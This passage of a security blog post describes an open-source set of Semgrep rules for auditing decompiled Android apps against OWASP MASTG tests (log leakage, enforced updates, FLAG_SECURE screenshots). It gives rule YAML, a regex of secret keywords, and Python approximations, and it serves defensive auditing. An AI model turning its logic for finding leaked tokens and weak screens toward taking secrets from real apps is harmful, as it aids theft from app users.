missing.</li></ul></div></div><div>The four main pattern-syntax elements you will find inside a <a href="https://semgrep.dev/docs/writing-rules/pattern-syntax/" target="_blank">Semgrep rule </a>yaml file are:</div>
<table class="tg" style="border-collapse: collapse; border-spacing: 0px;"><thead><tr><th style="border-color: inherit; border-style: solid; border-width: 1px; color: #f56b00; font-family: Arial, sans-serif; font-size: 14px; font-weight: bold; overflow: hidden; padding: 10px 5px; text-align: center; vertical-align: top; word-break: normal;">...</th><th style="border-color: rgb(0, 0, 0); border-style: solid; border-width: 1px; font-family: Arial, sans-serif; font-size: 14px; font-weight: normal; overflow: hidden; padding: 10px 5px; text-align: left; vertical-align: top; word-break: normal;"><span style="font-weight: 400;">Match a sequence of zero or more items such as arguments, statements, parameters, fields, characters.</span></th></tr></thead><tbody><tr><td style="border-color: inherit; border-style: solid; border-width: 1px; color: #f56b00; font-family: Arial, sans-serif; font-size: 14px; font-weight: bold; overflow: hidden; padding: 10px 5px; text-align: center; vertical-align: top; word-break: normal;">"..."</td><td style="border-color: inherit; border-style: solid; border-width: 1px; font-family: Arial, sans-serif; font-size: 14px; overflow: hidden; padding: 10px 5px; text-align: left; vertical-align: top; word-break: normal;"><span style="font-weight: 400;">Match any single hardcoded string.</span></td></tr><tr><td style="border-color: inherit; border-style: solid; border-width: 1px; color: #f56b00; font-family: Arial, sans-serif; font-size: 14px; font-weight: bold; overflow: hidden; padding: 10px 5px; text-align: center; vertical-align: top; word-break: normal;">$A</td><td style="border-color: inherit; border-style: solid; border-width: 1px; font-family: Arial, sans-serif; font-size: 14px; overflow: hidden; padding: 10px 5px; text-align: left; vertical-align: top; word-break: normal;"><span style="font-weight: 400;">Match variables, functions, arguments, classes, object methods, imports, exceptions, and more.</span></td></tr><tr><td style="border-color: 
inherit; border-style: solid; border-width: 1px; color: #f56b00; font-family: Arial, sans-serif; font-size: 14px; font-weight: bold; overflow: hidden; padding: 10px 5px; text-align: center; vertical-align: top; word-break: normal;"><... e ...></td><td style="border-color: inherit; border-style: solid; border-width: 1px; font-family: Arial, sans-serif; font-size: 14px; overflow: hidden; padding: 10px 5px; text-align: left; vertical-align: top; word-break: normal;"><span style="font-weight: 400;">Match an expression ("e") that could be deeply nested within another expression.</span></td></tr></tbody></table>
<div>
<br /></div><div>Moreover, Semgrep provides several additional <b>modes</b>, some of them still experimental, that can be really useful in more difficult situations:</div><div><ul><li><b><a href="https://semgrep.dev/docs/writing-rules/data-flow/taint-mode/" target="_blank">taint</a></b>: It enables data-flow analysis, letting you specify <b>sources</b> and <b>sinks</b> (and, optionally, sanitizers).</li><li><b><a href="https://semgrep.dev/docs/writing-rules/experiments/join-mode/overview/">join</a></b>: It allows <b>multiple rules</b> to be run on more than one file and their results to be joined on shared metavariables.</li><li><b><a href="https://semgrep.dev/docs/writing-rules/experiments/extract-mode/#introduction" target="_blank">extract</a></b>: It allows working with source files that embed <b>different programming languages</b>.</li></ul><div>Suppose you have a rules collection in the directory "myrules/" and the target source code in "mytarget/". Launching a Semgrep scan is very simple:</div></div></div></div><div><pre><code style="border-radius: 10px;">semgrep -c ./myrules ./mytarget</code></pre></div><div><br /></div><span><a name='more'></a></span><h2 style="text-align: left;">The Project:</h2><h2 style="text-align: left;">Semgrep Rules for Android Application Security</h2><h4 style="text-align: left;">The proposal</h4><div><div>In March 2023, the <b>IMQ Minded Security</b> team, with the purpose of contributing to the ethical hacking and mobile development communities, began the "Semgrep Rules for Android Application Security" project. The primary objective of this project is to provide a collection of Semgrep rules that cover the static tests described in the OWASP Mobile Application Security Testing Guide (MASTG) for Android applications. 
The project has been publicly released on the IMQ Minded Security official GitHub page:</div><div><ul style="text-align: left;"><li><a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">https://github.com/mindedsecurity/semgrep-rules-android-security</a></li></ul></div><div><br /></div><div>Currently, the project boasts more than 10 internal and external contributors with different degrees of seniority.</div></div><div><div><b>Supervisor</b>:</div><div><ul style="text-align: left;"><li>Stefano Di Paola (Twitter: <a href="https://twitter.com/WisecWisec" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@WisecWisec</a>)</li></ul></div><div><b>Project leader</b>:</div><div><ul style="text-align: left;"><li>Riccardo Cardelli (Github: <a href="https://github.com/gand3lf" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@gand3lf</a>)</li></ul></div><div><b>Contributors (In alphabetical order)</b>: </div><div><ul style="text-align: left;"><li>Andrea Agnello (Github: <a href="https://github.com/andrenoli" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@</a><span style="background-color: #f8f8f8; box-sizing: border-box; color: #1d1c1d; font-family: Arial; font-size: 15px; white-space-collapse: preserve;"><a href="https://github.com/andrenoli" style="background-color: transparent; box-sizing: border-box; color: #3d81ee; text-decoration-line: 
none;" target="_blank">AndreNoli</a></span>)</li><li>Christian Cotignola (Twitter: <a href="https://twitter.com/b4dsheep" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@b4dsheep</a>)</li><li>Federico Dotta (Twitter: <a href="https://twitter.com/apps3c" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@apps3c</a>)</li><li>Giacomo Zorzin (Mastodon: <a href="https://infosec.exchange/@gellge" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@gellge</a>)</li><li>Giovanni Fazi (Github: <a href="https://github.com/giovifazi" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@giovifazi</a>)</li><li>Martino Lessio (Twitter: <a href="https://twitter.com/martinolessio" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@Martinolessio</a>)</li><li>Maurizio Siddu (Github: <a href="https://github.com/akabe1" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI 
Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@akabe1</a>)</li><li>Michele Di Bonaventura (Twitter: <a href="https://twitter.com/cyberaz0r" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@cyberaz0r</a>)</li><li>Michele Tumolo (Twitter: <a href="https://twitter.com/0s0urce" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@0s0urce</a>)</li><li>Riccardo Granata (Github: <a href="https://github.com/riccardogranata" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@riccardogranata</a>)</li></ul></div></div><div><div style="text-align: left;">The "<i><a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">Semgrep Rules for Android Application Security</a></i>" project does not cover all of the OWASP MASTG tests, due to the intrinsic constraints of a SAST activity on a mobile application:</div><div><ul style="text-align: left;"><li>The back-end source code is out of scope.</li><li>The dynamic tests are out of scope.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhri04T_tuzbsGPMMCkTEq9hgn7d4LvuGSVq8-gdJYivcKf5gY6gdQxnew1bF01N1os4i_pfMjiAg9NbQkhNDksijUCNQAM3yfESgnq-IlBrF0yKZDrV0JwleHiNwG6x16Dcg6JnqUFuP2ryZJR7Sifs5pPpBLGPqOioHgWs8yq5bHQKxd8C37KSM5wYuM/s1353/mastg_1_5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" 
data-original-height="635" data-original-width="1353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhri04T_tuzbsGPMMCkTEq9hgn7d4LvuGSVq8-gdJYivcKf5gY6gdQxnew1bF01N1os4i_pfMjiAg9NbQkhNDksijUCNQAM3yfESgnq-IlBrF0yKZDrV0JwleHiNwG6x16Dcg6JnqUFuP2ryZJR7Sifs5pPpBLGPqOioHgWs8yq5bHQKxd8C37KSM5wYuM/s16000/mastg_1_5.png" /></a></div><div><br /></div></div></div><div>Using the project during an MAPT activity is very simple:</div><div><br /></div><div><pre><code style="border-radius: 10px;"># Obtain the target APK and clone the rules of the project
$ git clone https://github.com/mindedsecurity/semgrep-rules-android-security
# Extract and decompile the source code from the target APK file
$ jadx -d target_src target.apk
# Launch the scan from the project folder so that its .semgrepignore file is honoured
$ cd semgrep-rules-android-security/
# Run Semgrep with the new security rules
$ semgrep -c ./rules/ ../target_src/
<br /></code></pre><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">Some Implemented Rules</h2></div><div>The rules implemented are <b>more than 40</b>; this section contains a detailed description of four of the Semgrep rules included in the <i>"Semgrep Rules for Android Application Security"</i> project.</div><div><br /></div><h4 style="text-align: left;">MSTG-STORAGE-3</h4><div><div>The detailed description of the current test can be found at the following MASTG 1.5.0 reference:</div><div><ul style="text-align: left;"><li><a href="https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05d-Testing-Data-Storage.md#testing-logs-for-sensitive-data-mstg-storage-3">https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05d-Testing-Data-Storage.md#testing-logs-for-sensitive-data-mstg-storage-3</a></li></ul></div><div>As stated in the MSTG-STORAGE-3 test, the purpose is to identify any <b>sensitive data</b> written to both system and <b>application logs</b>.</div><div>To do this, two pieces of information are needed:</div><div><ol style="text-align: left;"><li>The methods and classes that are delegated to perform logging operations.</li><li>A regex that can be used to identify potentially sensitive data and attribute names.</li></ol></div><div>The first can be partially derived from the <i>MSTG-STORAGE-3</i> description. The identified methods are the following:</div><div><ul style="text-align: left;"><li><i>Log.v | Log.i | Log.w | Log.e | Log.wtf</i></li><li><i>System.out.print | System.err.print | System.out.println | System.err.println</i></li><li><i>Logger.log | Logger.info | Logger.logp | Logger.logrb | Logger.severe | Logger.warning</i></li></ul></div><div>Please note that the "<i>Log.d</i>" method is not included in the list: debug-level output is meant for development builds, and the project ties it to the "<i>android:debuggable</i>" flag of the Android manifest, which is verified by another implemented rule. 
Keep in mind, however, that the Android runtime does not silence "<i>Log.d</i>" in release builds: unless the call is guarded by "<i>BuildConfig.DEBUG</i>" or removed by an R8/ProGuard "<i>-assumenosideeffects</i>" rule, its output still reaches logcat and is worth reviewing manually.</div><div>About the second piece of information, the regex used to identify secrets inside the source code is the following:</div><div><i><span style="color: #38761d;">.*(?i)(key|secret|password|pwd|passwd|token|salt|seed|salt|bearer|otp|crypt|auth(?-i)|IV).*</span></i></div><div>Note the inline flag switch: every keyword is matched case-insensitively, while the "<i>(?-i)</i>" makes "<i>IV</i>" case-sensitive, so that the "iv" inside common identifiers such as "private" or "activity" does not trigger the rule.</div><div><br /></div><div>The following snippet shows the result translated into the Semgrep rule pattern language:</div></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">message: The application writes sensitive data in application logs.
patterns:
  - pattern-either:
      - pattern: Log.v(...);
      - pattern: Log.i(...);
      - pattern: Log.w(...);
      - pattern: Log.e(...);
      - pattern: Log.wtf(...);
      - pattern: System.$X.print(...);
      - pattern: System.$X.println(...);
      - pattern: (BufferedWriter $X).write(...);
      - pattern: (Logger $X).log(...);
      - pattern: (Logger $X).info(...);
      - pattern: (Logger $X).logp(...);
      - pattern: (Logger $X).logrb(...);
      - pattern: (Logger $X).severe(...);
      - pattern: (Logger $X).warning(...);
  - pattern-regex: .*(?i)(key|secret|password|pwd|...|bearer|otp|crypt|auth(?-i)|IV).*</code></pre>
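To see the logic of this rule at work without running Semgrep, here is a stand-alone Python approximation, added as an example for this page and not part of the project: one regular expression for the logging sinks listed above, a Python translation of the project's secret regex, and a constructed snippet of decompiled Java to scan. The class and variable names in the sample ("LoginActivity", "authToken", "cipher") are invented.

```python
import re

# Logging sinks from the rule above, collapsed into one regular expression.
# The typed Semgrep pattern "(Logger $X).info(...)" is approximated here by
# "<identifier>.info(": without type information a regex cannot tell a
# java.util.logging.Logger from any other object, which is one reason the
# Semgrep rule is more precise than this script.
LOG_CALL = re.compile(
    r"\b(?:Log\.(?:v|i|w|e|wtf)"                      # android.util.Log (Log.d deliberately excluded)
    r"|System\.(?:out|err)\.print(?:ln)?"             # System.out / System.err
    r"|\w+\.(?:log|info|logp|logrb|severe|warning))"  # java.util.logging.Logger methods
    r"\s*\("
)

# Python translation of the project's secret regex. PCRE inline flags such as
# "(?i) ... (?-i)IV" are not accepted mid-pattern by Python's re module, so a
# scoped group is used instead: every keyword is case-insensitive, while "IV"
# stays case-sensitive so that words like "private" or "activity" do not match.
SENSITIVE = re.compile(
    r"(?i:key|secret|password|pwd|passwd|token|salt|seed|bearer|otp|crypt|auth)|IV"
)


def find_sensitive_logging(java_source):
    """Return (line_number, stripped_line) for every statement that is BOTH a
    logging call (the pattern-either) AND mentions a sensitive name (the
    pattern-regex): the (A OR B) AND C logic of the rule."""
    findings = []
    for number, line in enumerate(java_source.splitlines(), start=1):
        if LOG_CALL.search(line) and SENSITIVE.search(line):
            findings.append((number, line.strip()))
    return findings


# Constructed sample of decompiled Java; names are invented for the example.
SAMPLE = """\
package com.example;
public class LoginActivity {
    void login(String user, String password) {
        Log.d("Login", "user=" + user);
        Log.i("Login", "password=" + password);
        System.out.println("token " + authToken);
        logger.info("session ok for " + user);
        byte[] iv = cipher.getIV();
        Log.e("Cipher", "IV=" + Arrays.toString(iv));
        Log.w("Login", "private activity resumed");
    }
}
"""

if __name__ == "__main__":
    for number, line in find_sensitive_logging(SAMPLE):
        print(f"{number}: {line}")   # lines 5, 6 and 9 are reported
```

Lines 4 (Log.d), 7 (a logging call without sensitive names) and 10 (lower-case "iv" inside ordinary words) are not reported, which is exactly the behaviour the case-sensitivity switch in the project's regex is there to obtain.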
<div>Patterns nested under a "patterns" node operate with a <b>logical AND</b> condition, whereas the "pattern-either" is used to represent a <b>logical OR</b> condition. The following pattern is equivalent to the logical condition <i>(A OR B) AND C</i>.</div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">patterns:
  - pattern-either:
      - pattern: A
      - pattern: B
  - pattern: C</code></pre><div><div>The final version of the rule can be consulted here:</div></div><div><ul><li><a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/storage/mstg-storage-3.yaml">https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/storage/mstg-storage-3.yaml</a></li></ul></div><div><br /></div><h4 style="text-align: left;">MSTG-ARCH-9</h4><div><div>The purpose of this test is to verify that the application <b>enforces updates</b>. This requirement applies to applications at MASVS <b>verification level</b> <b>L2</b>, such as banking applications, healthcare portals, government applications, e-commerce platforms, and more. To ensure that these targets have the latest security patches installed, users should be required to run the most recent version of the application.</div><div>The details of the test can be consulted at the following link:</div><div><ul style="text-align: left;"><li><a href="https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05h-Testing-Platform-Interaction.md#testing-enforced-updating-mstg-arch-9">https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05h-Testing-Platform-Interaction.md#testing-enforced-updating-mstg-arch-9</a></li></ul></div><div>To update an Android application programmatically with the Google Play In-App Updates API, at least three steps are required:</div><div><ol style="text-align: left;"><li>Check for updates ("<i>getAppUpdateInfo(...)</i>").</li><li>Request the update ("<i>startUpdateFlowForResult(...)</i>").</li><li>Check that the update completed successfully.</li></ol></div><div>The fundamental step that should be detected by the Semgrep rule is the second one. 
Unfortunately, a Semgrep <b>limitation</b> has to be dealt with:</div><div><i>At the current version, Semgrep does not provide a mechanism to detect the absence of a pattern</i>.</div><div>(Visit the link for further information: <a href="https://github.com/returntocorp/semgrep/issues/7363">https://github.com/returntocorp/semgrep/issues/7363</a>)</div><div><br /></div><div><div>In other words, when dealing with source code composed of N files, Semgrep cannot detect that a pattern is absent from all of them. However, it can detect the absence of a pattern within a <b>single</b> specific file, by means of "pattern-not".</div></div><div><br /></div><div>Thus, the adopted strategy is the following:</div><div>1. The main activity is the file that is most likely to enforce the update, and restricting the search to it confines the check to one single file. To identify the main activity class, it is sufficient to look for the activity whose "intent-filter" element contains the action "<i>android.intent.action.MAIN</i>" and the category "<i>android.intent.category.LAUNCHER</i>".</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="xquery" style="border-radius: 10px;"><!-- AndroidManifest.xml -->
<activity android:name="com.myexample.test.SplashScreen">
    <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
    </intent-filter>
</activity></code></pre>
<div><br /></div><div>2. The application must call the method "startUpdateFlowForResult" to enforce the application update.</div><div><br /></div><div>Clearly, this rule requires dealing with files in two different formats: XML and Java.</div><div>In this situation, it is possible to use the Semgrep join mode, which allows results from different rules to be combined:</div><div><ul style="text-align: left;"><li><a href="https://semgrep.dev/docs/writing-rules/experiments/join-mode/overview/">https://semgrep.dev/docs/writing-rules/experiments/join-mode/overview/</a></li></ul></div><div>The "on" directive specifies the constraints that must hold between the results of the joined rules. Consider the following example of join mode:</div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">rules:
  - id: join-rule-id
    mode: join
    join:
      rules:
        - id: rule1
          languages: # . . .
          pattern: # . . .
        - id: rule2
          languages: # . . .
          pattern: # . . .
      on:
        - 'rule1.$A == rule2.$B' # 1
        - 'rule1.$X > rule2.$Y' # 2</code></pre>
<div><br /></div><div><div>The "on" conditions are combined in AND logic:</div><div><ul style="text-align: left;"><li>"<i># 1</i>": the metavariable <i>$A</i> is equal to the metavariable <i>$B</i></li><li>"<i># 2</i>": the metavariable <i>$X</i> contains the metavariable <i>$Y</i></li></ul></div><div>The following snippet reports the implemented rule to cover the MSTG-ARCH-9 test.</div></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">mode: join
join:
  rules:
    - id: activity-without-update
      languages:
        - java
      patterns: # 1
        - pattern: |
            public class $CLASSNAME extends $ACTIVITY{
              public void onCreate(...){...}
            }
        - pattern-not: |
            public class $CLASSNAME extends $ACTIVITY{
              $X(...){
                ...
                (AppUpdateManager $Y).startUpdateFlowForResult(...);
                ...
              }
            }
        - focus-metavariable:
            - $CLASSNAME
    - id: main-activity
      languages:
        - xml
      patterns: # 2
        - pattern: |
            <activity ... android:name="$ACT" ...> ...
              <intent-filter> ...
                <action android:name="android.intent.action.MAIN"/> ...
                <category android:name="android.intent.category.LAUNCHER"/> ...
              </intent-filter> ...
            </activity>
        - focus-metavariable:
            - $ACT
  on:
    - 'main-activity.$ACT > activity-without-update.$CLASSNAME'</code></pre>
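The join above can be reproduced outside Semgrep to sanity-check its logic against your own inputs. The following Python script is added for this page and is not part of the project: it resolves the launcher activity from a constructed AndroidManifest.xml (the package "com.myexample.test" and the class "SplashScreen" follow the manifest excerpt above), looks the class up in a dictionary of constructed decompiled sources, and reports it when no method in it calls "startUpdateFlowForResult". The Java sources, including the identifiers "startMain" and "REQUEST_CODE", are invented for the example.

```python
import re
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"   # namespace of android:* attributes
UPDATE_CALL = re.compile(r"\.startUpdateFlowForResult\s*\(")


def main_activities(manifest_xml):
    """Equivalent of the 'main-activity' rule: fully qualified names of the
    activities whose <intent-filter> has action MAIN and category LAUNCHER."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    names = []
    for activity in root.iter("activity"):
        name = activity.get(ANDROID + "name", "")
        if name.startswith("."):          # relative names are prefixed with the package
            name = package + name
        for intent_filter in activity.findall("intent-filter"):
            actions = {a.get(ANDROID + "name") for a in intent_filter.findall("action")}
            categories = {c.get(ANDROID + "name") for c in intent_filter.findall("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in categories):
                names.append(name)
                break
    return names


def activities_without_enforced_update(manifest_xml, sources):
    """Equivalent of the join: 'sources' maps a fully qualified class name to its
    decompiled Java text; the launcher activity is reported when no method in it
    calls startUpdateFlowForResult (the 'activity-without-update' rule)."""
    return [name for name in main_activities(manifest_xml)
            if not UPDATE_CALL.search(sources.get(name, ""))]


# Constructed manifest, modelled on the AndroidManifest.xml excerpt above.
MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.myexample.test">
  <application>
    <activity android:name=".SplashScreen">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".SettingsActivity"/>
  </application>
</manifest>
"""

# Constructed decompiled source: the splash screen only checks for an update
# (step 1) and never requests it (step 2), which is what MSTG-ARCH-9 flags.
SOURCES_MISSING_UPDATE = {
    "com.myexample.test.SplashScreen": """\
public class SplashScreen extends AppCompatActivity {
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        AppUpdateManager manager = AppUpdateManagerFactory.create(this);
        manager.getAppUpdateInfo().addOnSuccessListener(info -> startMain());
    }
}
""",
}

# Same app with the update flow actually started: no finding.
SOURCES_ENFORCING_UPDATE = {
    "com.myexample.test.SplashScreen": """\
public class SplashScreen extends AppCompatActivity {
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        AppUpdateManager manager = AppUpdateManagerFactory.create(this);
        manager.getAppUpdateInfo().addOnSuccessListener(info ->
            manager.startUpdateFlowForResult(info, AppUpdateType.IMMEDIATE, this, REQUEST_CODE));
    }
}
""",
}

if __name__ == "__main__":
    print(activities_without_enforced_update(MANIFEST, SOURCES_MISSING_UPDATE))    # ['com.myexample.test.SplashScreen']
    print(activities_without_enforced_update(MANIFEST, SOURCES_ENFORCING_UPDATE))  # []
```

As with the Semgrep rule, the check is a substring match between the manifest name and the class name, and it only looks at the launcher activity: an update flow started from an Application subclass or a helper class would still be reported.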
<div><br /></div><div><div>The first pattern ("<i># 1</i>") matches any Activity subclass with an "onCreate" method that never calls "startUpdateFlowForResult", and focuses the match on the class name through the "focus-metavariable" directive. The second pattern ("<i># 2</i>") retrieves, inside the "AndroidManifest.xml" file, the name of the main activity.</div><div><br /></div><div>The condition "<i>main-activity.$ACT > activity-without-update.$CLASSNAME</i>" means that the metavariable <i>$ACT</i> (from the "main-activity" rule) has to contain the value of the metavariable <i>$CLASSNAME</i> (from the "activity-without-update" rule).</div><div><br /></div><div>Putting it all together, the rule reports a finding when the main activity of the target application does not contain a call to the standard method used to request an in-app update. Since the check is confined to the main activity, an update flow started elsewhere (for example in an <i>Application</i> subclass or in a dedicated helper class) is reported as a false positive and must be verified manually.</div></div><div><div>The most updated version of the rule can be consulted here:</div><div><ul><li><a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/arch/mstg-arch-9.yaml">https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/arch/mstg-arch-9.yaml</a></li></ul></div></div><h4 style="text-align: left;"><br /></h4><h4 style="text-align: left;">MSTG-STORAGE-9</h4><div><div>To prevent malicious applications from taking <b>screenshots</b> of <b>sensitive information</b>, it is good security practice for applications that display sensitive information to disable screenshots of those screens.</div><div>The OWASP MASTG provides details on how to correctly configure the application:</div><div><ul style="text-align: left;"><li><a href="https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05d-Testing-Data-Storage.md#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9">https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05d-Testing-Data-Storage.md#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9</a></li></ul></div><div>This 
topic has been extensively described in this blog in 2021 by the software security expert Martino Lessio:</div><div><ul style="text-align: left;"><li><a href="https://blog.mindedsecurity.com/2021/05/mobile-screenshot-prevention-cheatsheet.html">https://blog.mindedsecurity.com/2021/05/mobile-screenshot-prevention-cheatsheet.html</a></li></ul></div><div>The Android <i>Window</i> object, retrieved with the "<i>getWindow</i>" method, exposes the methods that control how the activity's screen content is displayed.</div><div>In particular, the "<i>setFlags</i>" and "<i>addFlags</i>" methods set window flags: "<i>setFlags</i>" overwrites the bits selected by its mask, while "<i>addFlags</i>" ORs the given bits into the current flags.</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="java" style="border-radius: 10px;">public void setFlags (int flags, int mask)
public void addFlags (int flags)</code></pre>
<div><br /></div><div><div>One of these flags is "<b>FLAG_SECURE</b>", documented as follows:</div><div>"Treat the content of the window as secure, preventing it from appearing in screenshots or from being viewed on non-secure displays."</div><div>The constant value associated with the flag is 8192 (<i>0x00002000</i>).</div><div><br /></div><div>To detect an insecure use of the "setFlags" method, the following rule can be used:</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">- patterns:
    - pattern-either:
        - pattern: getWindow().setFlags($P1, $P2)
        - pattern: (...).getWindow().setFlags($P1, $P2)
        - pattern: (Window $W).setFlags($P1, $P2)
    - metavariable-comparison:
        comparison: $P1 & 8192 == 0</code></pre>
<div><br /></div><div>Note that the "metavariable-comparison" can only be evaluated when <i>$P1</i> resolves to an integer. This is usually the case on decompiled code, because <i>javac</i> inlines compile-time constants and the literal 8192 ends up in the bytecode, whereas a symbolic reference such as "<i>WindowManager.LayoutParams.FLAG_SECURE</i>" that Semgrep cannot constant-fold does not match.</div><div>Moreover, "<i>FLAG_SECURE</i>" is not part of the default window flags, so we also have to detect all activities that never set this flag explicitly:</div><div><br /></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">- patterns:
    - pattern: public class $CLASS extends $ACT{ ... }
    - pattern-not: |
        public class $CLASS{...
          $M(...){...
            (...).addFlags(...);
          ...}
        ...}
    - pattern-not: |
        public class $CLASS{...
          $M(...){...
            (...).setFlags(...);
          ...}
        ...}
    - metavariable-regex:
        metavariable: $ACT
        regex: .*Activity.*</code></pre>
<div><br /></div><div><div>Unfortunately, it is not possible to exhaustively cover the misuse of "addFlags" due to a Semgrep limitation: there is no way to search for a method that does not contain an "addFlags" call whose argument satisfies a given condition.</div><div>In this case, the best available approximation is the following:</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">- patterns:
    - pattern-either:
        # addFlags(int) takes a single argument (see the signature above)
        - pattern: getWindow().addFlags($P1)
        - pattern: (...).getWindow().addFlags($P1)
        - pattern: (Window $W).addFlags($P1)
    - metavariable-comparison:
        comparison: $P1 & 8192 == 0</code></pre>
<div><br /></div><div><div>Similarly to the previous case, this snippet detects each "<i>addFlags</i>" call whose argument does not include "<i>FLAG_SECURE</i>".</div><div>This approach can introduce false positives, such as:</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="java" style="border-radius: 10px;">public class MainActivity extends AppCompatActivity {
    private void test() {
        getWindow().addFlags(222);  // This triggers the rule, generating a false positive
        getWindow().addFlags(8192); // FLAG_SECURE is added here, so the window is actually secure
    }
}</code></pre>
<div><br /></div><div>The most updated version of the rule can be consulted here:</div><div><ul style="text-align: left;"><li><a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/storage/mstg-storage-9.yaml">https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/storage/mstg-storage-9.yaml</a></li></ul><h4 style="text-align: left;"><br /></h4><h4 style="text-align: left;">MSTG-NETWORK-4</h4></div><div><div>The last rule shown on this post is described at the following link:</div><div><ul style="text-align: left;"><li><a href="https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4">https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4</a></li></ul></div><div>Typically, tests regarding SSL pinning are performed dynamically using tools such as Frida, Objection and others. 
